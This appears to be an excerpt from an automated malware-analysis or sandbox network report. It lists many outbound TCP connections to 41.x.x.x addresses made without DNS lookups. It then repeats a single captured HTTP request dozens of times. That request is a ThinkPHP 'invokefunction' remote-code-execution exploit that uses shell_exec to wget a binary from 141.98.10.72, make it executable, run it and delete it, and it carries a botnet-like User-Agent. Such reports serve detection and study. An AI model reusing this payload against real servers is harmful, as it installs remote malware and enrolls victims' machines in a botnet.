    Source: unknownTCP traffic detected without corresponding DNS query: 41.201.107.229
    Source: unknownTCP traffic detected without corresponding DNS query: 41.82.118.13
    Source: unknownTCP traffic detected without corresponding DNS query: 41.101.233.103
    Source: unknownTCP traffic detected without corresponding DNS query: 41.173.156.57
    Source: unknownTCP traffic detected without corresponding DNS query: 41.28.117.199
    Source: unknownTCP traffic detected without corresponding DNS query: 41.172.182.152
    Source: unknownTCP traffic detected without corresponding DNS query: 41.33.77.96
    Source: unknownTCP traffic detected without corresponding DNS query: 41.97.93.215
    Source: unknownTCP traffic detected without corresponding DNS query: 41.153.208.96
    Source: unknownTCP traffic detected without corresponding DNS query: 41.207.63.188
    Source: unknownTCP traffic detected without corresponding DNS query: 41.104.118.68
    Source: unknownTCP traffic detected without corresponding DNS query: 41.224.111.154
    Source: unknownTCP traffic detected without corresponding DNS query: 41.65.137.250
    Source: unknownTCP traffic detected without corresponding DNS query: 41.89.128.97
    Source: unknownTCP traffic detected without corresponding DNS query: 41.42.190.146
    Source: unknownTCP traffic detected without corresponding DNS query: 41.92.60.120
    Source: unknownTCP traffic detected without corresponding DNS query: 41.238.50.94
    Source: unknownTCP traffic detected without corresponding DNS query: 41.197.253.138
    Source: unknownTCP traffic detected without corresponding DNS query: 41.122.54.133
    Source: unknownTCP traffic detected without corresponding DNS query: 41.235.100.42
    Source: unknownTCP traffic detected without corresponding DNS query: 41.206.159.142
    Source: unknownTCP traffic detected without corresponding DNS query: 41.21.93.221
    Source: unknownTCP traffic detected without corresponding DNS query: 41.129.55.127
    Source: unknownTCP traffic detected without corresponding DNS query: 41.2.24.227
    Source: unknownTCP traffic detected without corresponding DNS query: 41.166.167.71
    Source: unknownTCP traffic detected without corresponding DNS query: 41.227.42.122
    Source: unknownTCP traffic detected without corresponding DNS query: 41.1.198.96
    Source: unknownTCP traffic detected without corresponding DNS query: 41.247.240.79
    Source: unknownTCP traffic detected without corresponding DNS query: 41.111.120.147
    Source: unknownTCP traffic detected without corresponding DNS query: 41.15.128.236
    Source: unknownTCP traffic detected without corresponding DNS query: 41.178.25.65
    Source: unknownTCP traffic detected without corresponding DNS query: 41.252.233.17
    Source: unknownTCP traffic detected without corresponding DNS query: 41.37.96.105
    Source: unknownTCP traffic detected without corresponding DNS query: 41.109.164.178
    Source: unknownTCP traffic detected without corresponding DNS query: 41.130.74.65
    Source: unknownTCP traffic detected without corresponding DNS query: 41.68.243.95
    Source: unknownTCP traffic detected without corresponding DNS query: 41.161.120.55
    Source: unknownTCP traffic detected without corresponding DNS query: 41.127.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 41.71.103.255
    Source: unknownTCP traffic detected without corresponding DNS query: 41.97.52.37
    Source: unknownTCP traffic detected without corresponding DNS query: 41.197.154.216
    Source: unknownTCP traffic detected without corresponding DNS query: 41.46.164.29
    Source: unknownTCP traffic detected without corresponding DNS query: 41.195.50.118
    Source: unknownTCP traffic detected without corresponding DNS query: 41.228.247.17
    Source: unknownTCP traffic detected without corresponding DNS query: 41.201.58.111
    Source: unknownTCP traffic detected without corresponding DNS query: 41.56.125.54
    Source: unknownTCP traffic detected without corresponding DNS query: 41.78.121.236
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
